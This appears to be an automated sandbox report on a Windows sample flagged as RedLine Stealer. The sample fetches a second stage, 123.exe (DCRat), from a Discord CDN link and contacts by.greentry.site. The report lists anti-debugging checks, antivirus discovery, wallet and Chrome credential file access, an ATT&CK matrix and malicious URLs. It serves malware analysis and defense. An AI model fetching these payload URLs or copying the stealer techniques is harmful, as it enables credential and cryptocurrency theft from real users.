                      Source: C:\Users\user\AppData\Local\Temp\123.exeProcess queried: DebugObjectHandle
                      Source: C:\Users\user\AppData\Local\Temp\123.exeProcess queried: DebugPort
                      Source: C:\Users\user\Desktop\MVB56JJDeJ.exeMemory allocated: page read and write | page guard
                      Source: C:\Users\user\Desktop\MVB56JJDeJ.exeCode function: 0_2_005011A5 SetUnhandledExceptionFilter,_iob,_setmode,_setmode,_setmode,__p__fmode,__p__environ,_cexit,ExitProcess,
                      Source: C:\Users\user\Desktop\MVB56JJDeJ.exeCode function: 0_2_00194862 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                      Source: C:\Users\user\Desktop\MVB56JJDeJ.exeCode function: 0_2_00191CF9 SetUnhandledExceptionFilter,
                      Source: C:\Users\user\Desktop\MVB56JJDeJ.exeCode function: 0_2_001916DC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                      Source: C:\Users\user\Desktop\MVB56JJDeJ.exeCode function: 0_2_00191B65 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                      Source: C:\Users\user\Desktop\MVB56JJDeJ.exeProcess created: C:\Users\user\AppData\Local\Temp\123.exe 'C:\Users\user\AppData\Local\Temp\123.exe'
                      Source: 123.exe, 00000007.00000002.925828191.00000000015C0000.00000002.00020000.sdmpBinary or memory string: Program Manager
                      Source: 123.exe, 00000007.00000002.925828191.00000000015C0000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
                      Source: 123.exe, 00000007.00000002.925828191.00000000015C0000.00000002.00020000.sdmpBinary or memory string: Progman
                      Source: 123.exe, 00000007.00000002.925828191.00000000015C0000.00000002.00020000.sdmpBinary or memory string: Progmanlock
                      Source: C:\Users\user\Desktop\MVB56JJDeJ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
                      Source: C:\Users\user\Desktop\MVB56JJDeJ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
                      Source: C:\Users\user\Desktop\MVB56JJDeJ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
                      Source: C:\Users\user\Desktop\MVB56JJDeJ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
                      Source: C:\Users\user\Desktop\MVB56JJDeJ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Users\user\Desktop\MVB56JJDeJ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Users\user\Desktop\MVB56JJDeJ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Users\user\Desktop\MVB56JJDeJ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                      Source: C:\Users\user\Desktop\MVB56JJDeJ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                      Source: C:\Users\user\Desktop\MVB56JJDeJ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\Desktop\MVB56JJDeJ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                      Source: C:\Users\user\Desktop\MVB56JJDeJ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
                      Source: C:\Users\user\Desktop\MVB56JJDeJ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\Desktop\MVB56JJDeJ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
                      Source: C:\Users\user\Desktop\MVB56JJDeJ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\123.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\123.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\123.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                      Source: C:\Users\user\Desktop\MVB56JJDeJ.exeCode function: 0_2_00586510 cpuid
                      Source: C:\Users\user\Desktop\MVB56JJDeJ.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                      Source: C:\Users\user\Desktop\MVB56JJDeJ.exeCode function: 0_2_00191A4F GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,
                      Source: C:\Users\user\Desktop\MVB56JJDeJ.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                      Source: C:\Users\user\Desktop\MVB56JJDeJ.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                      Source: C:\Users\user\Desktop\MVB56JJDeJ.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
                      Source: C:\Users\user\Desktop\MVB56JJDeJ.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                      Source: C:\Users\user\Desktop\MVB56JJDeJ.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                      Source: C:\Users\user\Desktop\MVB56JJDeJ.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
                      Source: MVB56JJDeJ.exe, 00000000.00000002.733426711.0000000002F97000.00000004.00000001.sdmpBinary or memory string: mdC:\Users\user\AppData\Local\Temp\123.exe
                      Source: MVB56JJDeJ.exe, 00000000.00000002.733426711.0000000002F97000.00000004.00000001.sdmpBinary or memory string: \123.exe
                      Source: MVB56JJDeJ.exe, 00000000.00000002.733426711.0000000002F97000.00000004.00000001.sdmpBinary or memory string: mbhttps://cdn.discordapp.com/attachments/897970496841347094/899319021416116294/123.exe|%tmp%\123.exe
                      Source: MVB56JJDeJ.exe, 00000000.00000002.733144385.0000000002EB1000.00000004.00000001.sdmpBinary or memory string: bhttps://cdn.discordapp.com/attachments/897970496841347094/899319021416116294/123.exe|%tmp%\123.exe
                      Source: MVB56JJDeJ.exe, 00000000.00000002.737077785.000000000629C000.00000004.00000001.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                      Source: MVB56JJDeJ.exe, 00000000.00000002.739017441.0000000008C40000.00000004.00000001.sdmp, 123.exe, 00000007.00000002.925797646.00000000013B0000.00000004.00000040.sdmpBinary or memory string: C:\Users\user\AppData\Local\Temp\123.exe
                      Source: MVB56JJDeJ.exe, 00000000.00000002.733426711.0000000002F97000.00000004.00000001.sdmp, 123.exe, 00000007.00000002.926238434.0000000003431000.00000004.00000001.sdmpBinary or memory string: m)C:\Users\user\AppData\Local\Temp\123.exe
                      Source: MVB56JJDeJ.exe, 00000000.00000002.736789549.00000000061C0000.00000004.00000001.sdmpBinary or memory string: RC:\Users\user\AppData\Local\Temp\123.exe
                      Source: MVB56JJDeJ.exe, 00000000.00000002.732036861.00000000009B1000.00000004.00000020.sdmp, 123.exe, 00000007.00000002.926238434.0000000003431000.00000004.00000001.sdmpBinary or memory string: 123.exe

                      Stealing of Sensitive Information:

                      barindex
                      Yara detected RedLine StealerShow sources
                      Source: Yara matchFile source: 0.2.MVB56JJDeJ.exe.10c0000.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.MVB56JJDeJ.exe.3e25530.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.MVB56JJDeJ.exe.3e25530.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.MVB56JJDeJ.exe.9ca598.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.MVB56JJDeJ.exe.1a2890.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.MVB56JJDeJ.exe.170e90.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.MVB56JJDeJ.exe.1a2890.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.MVB56JJDeJ.exe.10c0000.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.MVB56JJDeJ.exe.160000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.MVB56JJDeJ.exe.190000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.MVB56JJDeJ.exe.170e90.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.MVB56JJDeJ.exe.160000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.MVB56JJDeJ.exe.9ca598.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.731038018.0000000000160000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.733144385.0000000002EB1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.732418954.00000000010C0000.00000004.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.732036861.00000000009B1000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.731086479.0000000000191000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.735106738.0000000003E21000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: MVB56JJDeJ.exe PID: 6664, type: MEMORYSTR
                      Yara detected DCRatShow sources
                      Source: Yara matchFile source: 00000007.00000002.926446658.0000000004437000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: 123.exe PID: 3160, type: MEMORYSTR
                      Tries to steal Crypto Currency WalletsShow sources
                      Source: C:\Users\user\Desktop\MVB56JJDeJ.exeFile opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\
                      Source: C:\Users\user\Desktop\MVB56JJDeJ.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                      Found many strings related to Crypto-Wallets (likely being stolen)Show sources
                      Source: MVB56JJDeJ.exe, 00000000.00000002.733144385.0000000002EB1000.00000004.00000001.sdmpString found in binary or memory: ElectrumE
                      Source: MVB56JJDeJ.exe, 00000000.00000002.733144385.0000000002EB1000.00000004.00000001.sdmpString found in binary or memory: JaxxE
                      Source: MVB56JJDeJ.exe, 00000000.00000002.733144385.0000000002EB1000.00000004.00000001.sdmpString found in binary or memory: ExodusE
                      Source: MVB56JJDeJ.exe, 00000000.00000002.733144385.0000000002EB1000.00000004.00000001.sdmpString found in binary or memory: EthereumE
                      Source: 123.exeString found in binary or memory: set_UseMachineKeyStore
                      Tries to harvest and steal browser information (history, passwords, etc)Show sources
                      Source: C:\Users\user\Desktop\MVB56JJDeJ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                      Source: C:\Users\user\Desktop\MVB56JJDeJ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                      Source: C:\Users\user\Desktop\MVB56JJDeJ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data

                      Remote Access Functionality:

                      barindex
                      Yara detected RedLine StealerShow sources
                      Source: Yara matchFile source: 0.2.MVB56JJDeJ.exe.10c0000.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.MVB56JJDeJ.exe.3e25530.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.MVB56JJDeJ.exe.3e25530.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.MVB56JJDeJ.exe.9ca598.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.MVB56JJDeJ.exe.1a2890.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.MVB56JJDeJ.exe.170e90.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.MVB56JJDeJ.exe.1a2890.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.MVB56JJDeJ.exe.10c0000.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.MVB56JJDeJ.exe.160000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.MVB56JJDeJ.exe.190000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.MVB56JJDeJ.exe.170e90.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.MVB56JJDeJ.exe.160000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.MVB56JJDeJ.exe.9ca598.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.731038018.0000000000160000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.733144385.0000000002EB1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.732418954.00000000010C0000.00000004.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.732036861.00000000009B1000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.731086479.0000000000191000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.735106738.0000000003E21000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: MVB56JJDeJ.exe PID: 6664, type: MEMORYSTR
                      Yara detected DCRatShow sources
                      Source: Yara matchFile source: 00000007.00000002.926446658.0000000004437000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: 123.exe PID: 3160, type: MEMORYSTR

                      Mitre Att&ck Matrix

                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Valid AccountsWindows Management Instrumentation221Path InterceptionProcess Injection12Masquerading11OS Credential Dumping1System Time Discovery1Remote ServicesInput Capture1Exfiltration Over Other Network MediumEncrypted Channel11Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                      Default AccountsNative API1Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1Input Capture1Security Software Discovery771Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothNon-Standard Port1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion561Security Account ManagerProcess Discovery12SMB/Windows Admin SharesData from Local System3Automated ExfiltrationIngress Tool Transfer1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection12NTDSVirtualization/Sandbox Evasion561Distributed Component Object ModelInput CaptureScheduled TransferNon-Application Layer Protocol2SIM Card SwapCarrier Billing Fraud
                      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptObfuscated Files or Information2LSA SecretsApplication Window Discovery1SSHKeyloggingData Transfer Size LimitsApplication Layer Protocol3Manipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonRc.commonSoftware Packing22Cached Domain CredentialsRemote System Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSyncFile and Directory Discovery2Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc FilesystemSystem Information Discovery136Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      MVB56JJDeJ.exe39%VirustotalBrowse
                      MVB56JJDeJ.exe39%ReversingLabsWin32.Trojan.Fragtor
                      MVB56JJDeJ.exe100%Joe Sandbox ML

                      Dropped Files

                      SourceDetectionScannerLabelLink
                      C:\Users\user\AppData\Local\Temp\123.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\explorer.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Temp\123.exe29%MetadefenderBrowse
                      C:\Users\user\AppData\Local\Temp\123.exe39%ReversingLabsWin32.Trojan.Razy
                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\explorer.exe29%MetadefenderBrowse
                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\explorer.exe39%ReversingLabsWin32.Trojan.Razy

                      Unpacked PE Files

                      No Antivirus matches

                      Domains

                      No Antivirus matches

                      URLs

                      SourceDetectionScannerLabelLink
                      http://tempuri.org/IContract/CheckConnectResponse0%URL Reputationsafe
                      http://tempuri.org/IContract/ExtensionProcessesResponse0%URL Reputationsafe
                      http://tempuri.org/IContract/ExtensionSteamFilesResponse0%URL Reputationsafe
                      http://tempuri.org/IContract/ExtensionOpenVPNResponse0%URL Reputationsafe
                      http://tempuri.org/0%URL Reputationsafe
                      http://tempuri.org/IContract/ExtensionInstalledBrowsers0%URL Reputationsafe
                      http://tempuri.org/IContract/ExtensionBrowsers0%URL Reputationsafe
                      http://tempuri.org/IContract/ExtensionSteamFiles0%URL Reputationsafe
                      https://cdn.discordapp.com4Rl0%Avira URL Cloudsafe
                      http://tempuri.org/IContract/InitDisplay0%URL Reputationsafe
                      http://tempuri.org/IContract/ConfirmResponse0%URL Reputationsafe
                      http://tempuri.org/IContract/InitResponse0%URL Reputationsafe
                      http://tempuri.org/IContract/ExtensionNordVPN0%URL Reputationsafe
                      http://tempuri.org/IContract/ExtensionScannedFiles0%URL Reputationsafe
                      http://tempuri.org/IContract/SetEnvironmentResponse0%URL Reputationsafe
                      http://tempuri.org/IContract/ExtensionInstalledBrowsersResponse0%URL Reputationsafe
                      http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s0%URL Reputationsafe
                      http://tempuri.org/IContract/ExtensionScannedFilesResponse0%URL Reputationsafe
                      http://tempuri.org/IContract/ExtensionOpenVPN0%URL Reputationsafe
                      http://tempuri.org/IContract/ExtensionProcesses0%URL Reputationsafe
                      http://tempuri.org/IContract/ExtensionDiscordResponse0%URL Reputationsafe
                      http://tempuri.org/IContract/EnvironmentSettings0%URL Reputationsafe
                      http://tempuri.org/IContract/InitDisplayResponse0%URL Reputationsafe
                      http://tempuri.org/IContract/Confirm0%URL Reputationsafe
                      http://tempuri.org/IContract/ExtensionDefendersResponse0%URL Reputationsafe
                      http://tempuri.org/IContract/ExtensionHardwares0%URL Reputationsafe
                      http://tempuri.org/IContract/Init0%URL Reputationsafe
                      https://by.greentry.site0%VirustotalBrowse
                      https://by.greentry.site0%Avira URL Cloudsafe
                      http://tempuri.org/IContract/ExtensionFtpConnections0%URL Reputationsafe
                      http://tempuri.org/IContract/VerifyUpdateResponsesResponse0%Avira URL Cloudsafe
                      http://tempuri.org/IContract/ExtensionTelegramFiles0%URL Reputationsafe
                      http://tempuri.org/IContract/ExtensionProcessesResponseD0%Avira URL Cloudsafe
                      https://by.greentry.site1kerKKKKOOOOnel3KKKKOOOO2-useIntPtrr32.dlIntPtrl0%Avira URL Cloudsafe
                      http://tempuri.org/IContract/VerifyUpdateResponseD0%Avira URL Cloudsafe

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      cdn.discordapp.com
                      162.159.135.233
                      truefalse
                        high
                        by.greentry.site
                        45.130.41.15
                        truefalse
                          unknown

                          Contacted URLs

                          NameMaliciousAntivirus DetectionReputation
                          https://cdn.discordapp.com/attachments/897970496841347094/899319021416116294/123.exefalse
                            high

                            URLs from Memory and Binaries

                            NameSourceMaliciousAntivirus DetectionReputation
                            http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#TextMVB56JJDeJ.exe, 00000000.00000002.733144385.0000000002EB1000.00000004.00000001.sdmpfalse
                              high
                              http://schemas.xmlsoap.org/ws/2005/02/sc/sctMVB56JJDeJ.exe, 00000000.00000002.733144385.0000000002EB1000.00000004.00000001.sdmpfalse
                                high
                                https://duckduckgo.com/chrome_newtabMVB56JJDeJ.exe, 00000000.00000002.733981566.0000000003112000.00000004.00000001.sdmpfalse
                                  high
                                  http://schemas.xmlsoap.org/ws/2004/04/security/sc/dkMVB56JJDeJ.exe, 00000000.00000002.733144385.0000000002EB1000.00000004.00000001.sdmpfalse
                                    high
                                    https://duckduckgo.com/ac/?q=MVB56JJDeJ.exe, 00000000.00000002.733981566.0000000003112000.00000004.00000001.sdmp, MVB56JJDeJ.exe, 00000000.00000002.735531936.0000000003F52000.00000004.00000001.sdmpfalse
                                      high
                                      http://tempuri.org/IContract/CheckConnectResponseMVB56JJDeJ.exe, 00000000.00000002.733144385.0000000002EB1000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://tempuri.org/IContract/ExtensionProcessesResponseMVB56JJDeJ.exe, 00000000.00000002.733062176.0000000002E21000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://tempuri.org/IContract/ExtensionSteamFilesResponseMVB56JJDeJ.exe, 00000000.00000002.733981566.0000000003112000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://tempuri.org/IContract/ExtensionOpenVPNResponseMVB56JJDeJ.exe, 00000000.00000002.733062176.0000000002E21000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://tempuri.org/MVB56JJDeJ.exe, 00000000.00000002.733144385.0000000002EB1000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1MVB56JJDeJ.exe, 00000000.00000002.733144385.0000000002EB1000.00000004.00000001.sdmpfalse
                                        high
                                        http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_WrapMVB56JJDeJ.exe, 00000000.00000002.733144385.0000000002EB1000.00000004.00000001.sdmpfalse
                                          high
                                          http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLIDMVB56JJDeJ.exe, 00000000.00000002.733144385.0000000002EB1000.00000004.00000001.sdmpfalse
                                            high
                                            http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecretMVB56JJDeJ.exe, 00000000.00000002.733144385.0000000002EB1000.00000004.00000001.sdmpfalse
                                              high
                                              http://tempuri.org/IContract/ExtensionInstalledBrowsersMVB56JJDeJ.exe, 00000000.00000002.733062176.0000000002E21000.00000004.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              unknown
                                              https://support.google.com/chrome/?p=plugin_realMVB56JJDeJ.exe, 00000000.00000002.733685867.0000000003050000.00000004.00000001.sdmpfalse
                                                high
                                                http://tempuri.org/IContract/ExtensionBrowsersMVB56JJDeJ.exe, 00000000.00000002.733062176.0000000002E21000.00000004.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                unknown
                                                http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/IssueMVB56JJDeJ.exe, 00000000.00000002.733144385.0000000002EB1000.00000004.00000001.sdmpfalse
                                                  high
                                                  http://schemas.xmlsoap.org/ws/2004/10/wsat/AbortedMVB56JJDeJ.exe, 00000000.00000002.733144385.0000000002EB1000.00000004.00000001.sdmpfalse
                                                    high
                                                    http://tempuri.org/IContract/ExtensionSteamFilesMVB56JJDeJ.exe, 00000000.00000002.733062176.0000000002E21000.00000004.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequenceMVB56JJDeJ.exe, 00000000.00000002.733062176.0000000002E21000.00000004.00000001.sdmpfalse
                                                      high
                                                      http://schemas.xmlsoap.org/ws/2004/10/wsat/faultMVB56JJDeJ.exe, 00000000.00000002.733144385.0000000002EB1000.00000004.00000001.sdmpfalse
                                                        high
                                                        http://schemas.xmlsoap.org/ws/2004/10/wsatMVB56JJDeJ.exe, 00000000.00000002.733144385.0000000002EB1000.00000004.00000001.sdmpfalse
                                                          high
                                                          https://cdn.discordapp.com4RlMVB56JJDeJ.exe, 00000000.00000002.733426711.0000000002F97000.00000004.00000001.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          http://tempuri.org/IContract/InitDisplayMVB56JJDeJ.exe, 00000000.00000002.733062176.0000000002E21000.00000004.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          unknown
                                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameMVB56JJDeJ.exe, 00000000.00000002.733144385.0000000002EB1000.00000004.00000001.sdmp, 123.exe, 00000007.00000002.926349748.00000000034A9000.00000004.00000001.sdmpfalse
                                                            high
                                                            http://tempuri.org/IContract/ConfirmResponseMVB56JJDeJ.exe, 00000000.00000002.733062176.0000000002E21000.00000004.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            unknown
                                                            http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/RenewMVB56JJDeJ.exe, 00000000.00000002.733144385.0000000002EB1000.00000004.00000001.sdmpfalse
                                                              high
                                                              http://schemas.xmlsoap.org/ws/2004/10/wscoor/RegisterMVB56JJDeJ.exe, 00000000.00000002.733144385.0000000002EB1000.00000004.00000001.sdmpfalse
                                                                high
                                                                http://tempuri.org/IContract/InitResponseMVB56JJDeJ.exe, 00000000.00000002.733309330.0000000002EFC000.00000004.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                unknown
                                                                http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKeyMVB56JJDeJ.exe, 00000000.00000002.733144385.0000000002EB1000.00000004.00000001.sdmpfalse
                                                                  high
                                                                  http://tempuri.org/IContract/ExtensionNordVPNMVB56JJDeJ.exe, 00000000.00000002.733062176.0000000002E21000.00000004.00000001.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  http://tempuri.org/IContract/ExtensionScannedFilesMVB56JJDeJ.exe, 00000000.00000002.733144385.0000000002EB1000.00000004.00000001.sdmp, MVB56JJDeJ.exe, 00000000.00000002.733062176.0000000002E21000.00000004.00000001.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/CancelMVB56JJDeJ.exe, 00000000.00000002.733144385.0000000002EB1000.00000004.00000001.sdmpfalse
                                                                    high
                                                                    http://tempuri.org/IContract/SetEnvironmentResponseMVB56JJDeJ.exe, 00000000.00000002.733062176.0000000002E21000.00000004.00000001.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    unknown
                                                                    http://tempuri.org/IContract/ExtensionInstalledBrowsersResponseMVB56JJDeJ.exe, 00000000.00000002.733981566.0000000003112000.00000004.00000001.sdmpfalse
                                                                    • URL Reputation: safe
